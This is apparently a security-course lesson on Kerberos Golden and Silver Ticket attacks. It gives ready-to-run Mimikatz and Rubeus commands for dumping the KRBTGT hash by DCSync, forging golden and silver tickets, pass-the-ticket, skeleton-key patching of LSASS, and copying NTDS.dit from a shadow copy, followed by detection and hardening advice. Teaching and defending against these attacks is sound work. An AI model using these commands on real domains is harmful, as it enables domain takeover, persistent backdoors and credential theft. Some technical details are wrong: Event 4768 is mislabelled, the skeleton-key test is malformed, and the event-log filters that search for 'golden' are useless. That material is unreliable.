๐ซ Lesson 2: Golden & Silver Ticket Attacks
Advanced ticket-based attack techniques and persistence mechanisms
๐ Learning Objectives
By the end of this lesson, you will be able to:
- Understand Golden and Silver ticket attack methodologies
- Master KRBTGT account exploitation techniques
- Execute service account abuse for Silver tickets
- Implement advanced persistence mechanisms
- Analyze ticket-based attack artifacts
- Deploy effective detection and prevention strategies
๐ฅ Golden Ticket Attack
What is a Golden Ticket?
A Golden Ticket is a forged Ticket Granting Ticket (TGT) that allows an attacker to impersonate any user in the domain. This attack requires compromising the KRBTGT account, which is used to encrypt all TGTs in the domain.
๐ Golden Ticket Key Characteristics:
- Domain-wide Access: Can access any service in the domain
- Arbitrary Privileges: Can impersonate any user or group
- Persistent Access: Works even after password changes
- Stealth Operation: Difficult to detect without proper monitoring
Golden Ticket Attack Process
1
๐ KRBTGT Compromise
Obtain the KRBTGT account password hash
Methods:
- DCSync attack (requires Domain Admin privileges)
- NTDS.dit extraction and cracking
- Memory dumping from Domain Controller
- Volume Shadow Copy exploitation
2
๐ซ Ticket Generation
Create forged TGT with desired privileges
Required Information:
- Domain SID
- KRBTGT password hash
- Target user account
- Desired group memberships
3
๐ Ticket Usage
Use Golden Ticket for domain access
Capabilities:
- Access any service in domain
- Impersonate any user account
- Maintain persistent access
- Bypass most security controls
Golden Ticket Implementation
๐ง Using Mimikatz
Traditional Golden Ticket creation with Mimikatz
Command Syntax:
# Extract KRBTGT hash
lsadump::dcsync /domain:domain.com /user:krbtgt
# Create Golden Ticket
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:golden.kirbi
# Use Golden Ticket
kerberos::ptt golden.kirbi
โก Using Rubeus
Modern C# implementation with Rubeus
Command Syntax:
# Create Golden Ticket
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi
# Use Golden Ticket
Rubeus.exe ptt /ticket:golden.kirbi
# Create with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /groups:512,513,518,519,520
๐ฅ Silver Ticket Attack
What is a Silver Ticket?
A Silver Ticket is a forged service ticket that allows direct access to a specific service without going through the Ticket Granting Service (TGS). This attack requires compromising the service account password.
๐ Silver Ticket Key Characteristics:
- Service-specific: Only works for the targeted service
- Direct Access: Bypasses TGS authentication
- Limited Scope: Cannot access other services
- Faster Execution: No TGS communication required
Silver Ticket Attack Process
1
๐ฏ Service Account Compromise
Obtain the service account password hash
Methods:
- Kerberoasting attack
- Password cracking
- Memory dumping
- Credential theft
2
๐ซ Service Ticket Creation
Generate forged service ticket for target service
Required Information:
- Service account password hash
- Service Principal Name (SPN)
- Target service details
- User account for impersonation
3
๐ Direct Service Access
Use Silver Ticket to access service directly
Capabilities:
- Direct service authentication
- Bypass TGS requirements
- Impersonate user accounts
- Access service resources
Silver Ticket Implementation
๐ง Using Mimikatz
Traditional Silver Ticket creation
Command Syntax:
# Create Silver Ticket for CIFS service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:server01.domain.com /service:cifs /rc4:service_hash /ticket:silver.kirbi
# Create Silver Ticket for HTTP service
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /target:web01.domain.com /service:http /rc4:service_hash /ticket:silver.kirbi
# Use Silver Ticket
kerberos::ptt silver.kirbi
โก Using Rubeus
Modern Silver Ticket implementation
Command Syntax:
# Create Silver Ticket
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com /ticket:silver.kirbi
# Use Silver Ticket
Rubeus.exe ptt /ticket:silver.kirbi
# Create for multiple services
Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs,ldap,http/server01.domain.com
๐ Advanced Persistence Techniques
Ticket-based Persistence
๐ Ticket Renewal
Extending ticket validity for long-term access
Implementation:
- Set extended ticket lifetime
- Use ticket renewal mechanisms
- Automate ticket refresh
- Maintain continuous access
# Rubeus ticket renewal
Rubeus.exe renew /ticket:golden.kirbi
# Mimikatz ticket renewal
kerberos::purge
kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-... /krbtgt:hash /ticket:renewed.kirbi
๐ญ User Impersonation
Creating tickets for specific user accounts
Implementation:
- Target high-privilege accounts
- Include multiple group memberships
- Set appropriate ticket flags
- Maintain stealth operations
# Create ticket for specific user with custom groups
Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:target_user /groups:512,513,518,519,520 /ticket:custom.kirbi
๐ Skeleton Key
Installing backdoor authentication mechanism
Implementation:
- Patch LSASS with skeleton key
- Set universal password
- Maintain normal authentication
- Enable backdoor access
# Mimikatz skeleton key
privilege::debug
misc::skeleton
# Test skeleton key
lsadump::dcsync /domain:domain.com /user:Administrator /password:mimikatz
๐ Detection and Analysis
Ticket Attack Indicators
๐ Event Log Analysis
Windows Event Log indicators of ticket attacks
Key Events:
- Event ID 4624 - Successful logon with unusual source
- Event ID 4768 - TGS ticket requested
- Event ID 4769 - Service ticket requested
- Event ID 4771 - Kerberos pre-authentication failed
๐ Network Traffic Analysis
Network-based detection of ticket attacks
Traffic Patterns:
- Unusual Kerberos traffic patterns
- Direct service access without TGS
- Multiple failed authentication attempts
- Anomalous ticket lifetimes
๐ฏ Behavioral Analysis
User and system behavior indicators
Behavioral Signs:
- Privilege escalation patterns
- Unusual service access
- Lateral movement indicators
- Persistence mechanism deployment
Detection Tools and Techniques
๐ก๏ธ Microsoft Security Tools
- Windows Defender ATP: Advanced threat protection
- Azure Sentinel: SIEM and security analytics
- Advanced Threat Analytics: Behavioral analysis
- Security and Compliance Center: Unified security management
๐ Third-party Solutions
- Splunk: Security information and event management
- QRadar: Security intelligence platform
- Carbon Black: Endpoint detection and response
- CrowdStrike: Cloud-native security platform
๐ก๏ธ Defense Strategies
Prevention and Mitigation
๐ KRBTGT Security
Implementation:
- Regular KRBTGT password rotation
- Strong password policies
- Monitoring KRBTGT access
- Restricted administrative access
- Regular security assessments
๐ซ Ticket Security
Implementation:
- Short ticket lifetimes
- Ticket renewal restrictions
- Anomalous ticket detection
- Service account hardening
- Regular ticket monitoring
๐ Monitoring & Detection
Implementation:
- Comprehensive event logging
- Real-time alerting systems
- Behavioral analysis tools
- Network traffic monitoring
- SIEM integration
๐ง Configuration Hardening
Implementation:
- Secure service account management
- Privilege escalation controls
- Network segmentation
- Access control restrictions
- Regular security updates
๐งช Hands-On Exercise
Exercise: Golden and Silver Ticket Attack Simulation
Objective: Simulate Golden and Silver ticket attacks in a controlled environment and implement detection mechanisms.
๐ Steps:
-
Environment Setup
Prepare the attack environment:
# Verify domain controller access klist # Check current tickets Rubeus.exe klist # Verify domain information whoami /all -
KRBTGT Hash Extraction
Extract KRBTGT account hash:
# Using DCSync (requires Domain Admin) lsadump::dcsync /domain:domain.com /user:krbtgt # Alternative: Volume Shadow Copy vssadmin list shadows vssadmin create shadow /for=C: copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit -
Golden Ticket Creation
Create and use Golden Ticket:
# Create Golden Ticket Rubeus.exe golden /rc4:krbtgt_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /ticket:golden.kirbi # Use Golden Ticket Rubeus.exe ptt /ticket:golden.kirbi # Verify ticket usage Rubeus.exe klist dir \\server01.domain.com\C$ -
Silver Ticket Creation
Create and use Silver Ticket:
# Get service account hash (from Kerberoasting) Rubeus.exe kerberoast /user:sqlservice /ticket:service.kirbi # Create Silver Ticket Rubeus.exe silver /rc4:service_hash /domain:domain.com /sid:S-1-5-21-... /user:Administrator /service:cifs/server01.domain.com # Use Silver Ticket Rubeus.exe ptt /ticket:silver.kirbi -
Detection Implementation
Implement detection mechanisms:
# Monitor Kerberos events Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*golden*"} # Check for anomalous ticket lifetimes Get-WinEvent -FilterHashtable @{LogName='Security'; ID=4768} | Where-Object {$_.Message -like "*lifetime*"}
๐ Deliverables:
- Golden Ticket attack demonstration
- Silver Ticket attack demonstration
- Detection mechanism implementation
- Security recommendations report